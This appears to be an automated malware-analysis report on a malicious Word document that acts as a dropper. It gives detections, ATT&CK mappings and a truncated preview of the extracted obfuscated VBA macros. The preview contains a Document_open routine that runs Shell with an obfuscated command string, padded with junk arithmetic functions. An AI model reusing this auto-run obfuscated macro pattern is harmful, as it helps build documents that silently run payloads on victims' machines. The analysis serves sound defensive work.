MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1203 Exploitation for Client Execution
The sample is a malicious OLE document containing VBA macros. The 'Document_Open' macro and a 'Shell()' call indicate that the document is designed to execute arbitrary code upon opening. The ClamAV detection 'Doc.Dropper.Agent-6614716-0' further supports its malicious nature as a dropper. The VBA script itself is heavily obfuscated, but the presence of the Shell() call strongly suggests it attempts to download and execute a secondary payload.
Heuristics 5
-
ClamAV: Doc.Dropper.Agent-6614716-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6614716-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 34939 bytes |
SHA-256: 116740c6f8fdd0293c358feac11b00f3f93fba03e5fbbaa44fae9d31b449fa69 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ojqiziUUtivn"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function EzCFZizwtwuXz()
On Error Resume Next
KpOBRh = jsQiW + 48410 / tOtZCz / qQEPY / VSYbA + WBwww + QfDumj * ZGUmP - (27108 / udTYKm / XpRUoi + CwvSv)
zOXkN = vCmkL + 1298 / JCMMNQ / LZXjmo / EqhwOT + RGJpAR + ZZDiaw * HSmXc - (98196 / arrzYT / LFmzjW + wCXNzb)
TwMqk = XuamUj + 83734 / SrbzI / URktb / KPPKd + FZXsk + itnKML * nAhkf - (72845 / SXjCN / OUmHi + IziRr)
tNnQjU = qKcvF + 7044 / VvsGwd / addWJ / WoLhta + tmVcL + iJhmq * YwJGja - (29871 / dSjJu / iqBwvB + itjaPu)
LMQXD = mGmBoJ + 98653 / IioIp / GDTVq / hurAU + ZUEkB + UFRsPD * VArkOF - (28014 / mzIsv / qzrPlh + jiCYhL)
wtqmuk = MifGiP + 91069 / CLhkdn / irpwt / ZfQjf + hZtXz + tdTTpX * jThPi - (19493 / MnKzz / qmnCOa + FOAJnh)
TDviYL = DBfINU + 41908 / iZlLms / lazwzW / YTUTt + aYtmat + olLaN * KOWjjH - (86580 / RVhZNd / cMouav + Kfzlt)
End Function
Private Function cZHUsinnwv()
On Error Resume Next
dbHOBS = 30069 - QBvcmq + (39116 - QSoBs + oREjZw / rHJWJG) * 85355 - oAOzlX - JZKWfa / vVorv
JSsSrY = 88983 - Gdkbnc + (34382 - EHKFIf + DRNfL / iRKFoi) * 66077 - itzoW - jmDnk / vkklhi
DvAzdV = 66449 - LLlWP + (79858 - aoESUU + KWYWH / mwfUVT) * 24156 - kTmCCj - RokEC / MzsdOJ
pBitjz = 46214 - ZWzzj + (7924 - NLRlLs + Oauhs / jZXFAp) * 63241 - PFFYvV - jnnur / XaQwS
End Function
Private Function PPaJEZhoPdfkY()
On Error Resume Next
FNSjF = iozWfa + 27706 / cYXnLF / hWYkT / wAcFl + FvKvW + XWImn * vfBXjB - (63192 / FjYrt / lvjnWR + RIkScB)
ckmwS = UPnDGh + 44292 / Vcawu / AfFhL / YsjdU + hQaaGu + kQudi * dCSOF - (60052 / QSMwfE / wEbjKj + AGavV)
JIFBWR = TGiawY + 43718 / DduCI / jpLTz / dwrSjz + HJHvJ + DcwzIL * wkDzA - (37036 / TcTuh / TFXOL + wOPGwi)
jvCup = SvXUG + 64569 / pqLCz / JjtJq / CBvRXU + dMGFh + hbNwld * EvjfBI - (37508 / ZnqmM / nPWiA + AEwil)
htUfR = NHjjw + 4857 / JipKY / lDzXzn / aEIctq + swYWup + BHucI * SihnV - (23618 / qBkWWr / sIwDmG + WMKTP)
SawjHf = lGUQQP + 2137 / DYPSVY / MqSkdw / wwtXh + ldEjH + SjuGN * wHBZST - (16548 / YNGQX / zlKVW + hzHZUj)
jNujio = DbRaYQ + 6740 / XTCXZ / qUPVzi / QFGAE + VTdIKK + rEWwsc * jNwZd - (5606 / tsfNl / RmWKZ + jhFtL)
End Function
Private Sub Document_open()
On Error Resume Next
NUNqo = 23497 / ObUXw / DEJQzN - CZjsj * (IOPaL - pGXSrG - (49885 - nwjuin))
zjlnih = 82636 / CDluj / vBGLv - ZEmIp * (XwHvL - NYDLA - (50559 - mtGsK))
Shell "" + UNLfBGonUHPEqz + qJXjlSJZ + CVar("c") + DsmOvUkRuN + nAjiWwK + iDboBi + KjDjziJKX + AsqWDnSY + rcWAGXPT + tRXBFtkuvrA + fMBHjqzr + HuGBBOp + MBDPuz + dLmZfRkzr + TIuioCLzPXz + XOUmSdCln + zWMoZtMnLh + zndQmPEX + cwIKuDGrXhIzjA, 0
IZSLcu = 65205 / aIifY / IAISXb - czDlT * (awwEck - HfFjRi - (31864 - klZbSY))
qRcEk = 61136 / PaIDH / bEBuj - cvZApL * (sNdKA - BqHmz - (61574 - bFqJI))
End Sub
Private Function XbLAIhpkqKvUsp()
On Error Resume Next
nmRlnS = 70239 / QFrJmz / jfjIL - NEiGs * (zWiWlu - krjvGF - (82863 - kCpfzs))
iciDw = 65137 / rciMi / zppSw - uvbUvI * (ajioto - HznSa - (68653 - oMkYnD))
oJjaU = 49963 / jfvhmG / iGPHNj - kdDUid * (sausL - qNEUJ - (20536 - APKXE))
ZiuidP = 29215 / ImuJH / NooXYG - CXsPF * (irwIF - wGAtP - (22560 - sqiffa))
TjQqfF = 21987 / jdFqw / qFApbv - VBuwCX * (VSfQAi - JKENGz - (73677 - bOTNdK))
End Function
Private Function wkPfLdXHCOXJjP()
On Error Resume Next
qamDz = (38246 + lPbrwU - 6403 * XrChE) / WAcpwt + oXOzj * 57564 - aBhOH
sWdiv = (53439 + hmNkr - 71743 * NhqpKY) / Pwlim + zQbDX * 38320 - kicPi
aMRSS = (97323 + jLtmvY - 38250 * KOAaz) / sNsOqC + VJoalb * 92361 - KWiuMH
pmKiNu = 46885 / cOJXr / olGjv - sZLTj * (rAolLb - AqoJR - (73538 - LECwU))
tRJOok = (36726 + wUwKP - 1842 * IJOrbr) / jdAGu + ravhLd * 36229 - nJzPYT
MoFjA = (84070 + NhTSh - 98925 * DcwrL) / FLJwX + ArWfnp * 63082 - fakVwd
End F
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.